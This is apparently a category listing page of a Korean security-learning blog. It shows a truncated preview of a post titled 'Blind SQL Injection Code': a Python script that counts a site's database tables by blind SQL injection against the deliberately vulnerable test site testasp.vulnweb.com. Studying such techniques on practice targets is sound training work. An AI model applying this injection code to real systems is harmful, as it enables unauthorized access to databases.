Seize Security

Seize Security

  • 분류 전체보기 (150)
    • 암호학 (17)
      • C언어 (11)
      • 암호모듈 (2)
      • 인증서 (4)
    • 정보보안과정 (38)
      • 정보보안 선수학습 (1)
      • 리눅스 기초 (4)
      • 리눅스 서버 관리자 (13)
      • 리눅스 네트워크 관리자 (6)
      • Shell Script (1)
      • 웹 페이지 취약점 진단 (4)
      • 인프라 취약점 진단 (8)
      • SQL Injection (1)
    • Lord of SQLinjection (18)
    • 보안 꿀팁 (24)
    • 트러블슈팅 (1)
    • 보안 (5)
    • DVWA (10)
    • FTZ (2)
    • 용어정리 (5)
    • 정보처리기사 실기 (2)
    • 잡동사니 (2)
    • 호랭이 (0)
    • 어셈블리어 (1)
    • 프로그래밍 언어 (13)
      • C++ (13)
  • 홈
  • 태그
  • 방명록
RSS 피드
로그인
로그아웃 글쓰기 관리

Seize Security

컨텐츠 검색

태그

코멘토 후기 직무부트캠프 직무부트캠프 후기 코멘토 코멘토 직무부트캠프 내돈내산

최근글

댓글

공지사항

아카이브

정보보안과정/SQL Injection(1)

  • Blind SQL Injection Code

    #!/usr/bin/python import requests url = "http://testasp.vulnweb.com/showforum.asp?id=2 and " param = "(select count(*) from information_schema.tables) = " table_name = "table_name from information_schema.tables" print("\n#### Find Num of Table ####") for i in range(1, 20): url_a = url + param + str(i) req = requests.get(url_a) # print(req) if "acuforum Miscellaneous" in req.text: print("table_nu..

    2020.04.14
이전
1
다음
티스토리
© 2018 TISTORY. All rights reserved.

티스토리툴바